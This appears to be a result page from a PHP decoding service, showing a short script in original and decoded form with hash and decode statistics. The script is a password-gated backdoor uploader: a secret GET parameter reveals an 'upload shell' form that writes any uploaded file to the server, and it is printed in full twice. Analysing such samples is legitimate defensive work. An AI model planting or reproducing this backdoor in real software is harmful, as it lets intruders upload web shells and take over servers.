Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $yassine = $_GET['kroos']; if($yassine == 'kroos'){ $xsecshell = $_FILES['file']..

Decoded Output download

<?php 
$yassine  = $_GET['kroos']; 
if($yassine == 'kroos'){ 
$xsecshell = $_FILES['file']['name']; 
$xsecteam  = $_FILES['file']['tmp_name']; 
echo "<form method='POST' enctype='multipart/form-data'> 
 <input type='file'name='file' /> 
 <input type='submit' value='upload shell' /> 
</form>"; 
move_uploaded_file($xsecteam,$xsecshell);  
} 
?>

Did this file decode correctly?

Original Code

<?php
$yassine  = $_GET['kroos'];
if($yassine == 'kroos'){
$xsecshell = $_FILES['file']['name'];
$xsecteam  = $_FILES['file']['tmp_name'];
echo "<form method='POST' enctype='multipart/form-data'>
 <input type='file'name='file' />
 <input type='submit' value='upload shell' />
</form>";
move_uploaded_file($xsecteam,$xsecshell); 
}
?>

Function Calls

None

Variables

$yassine None

Stats

MD5 f544f4e0c5bddeb5ce997928a2958426
Eval Count 0
Decode Time 107 ms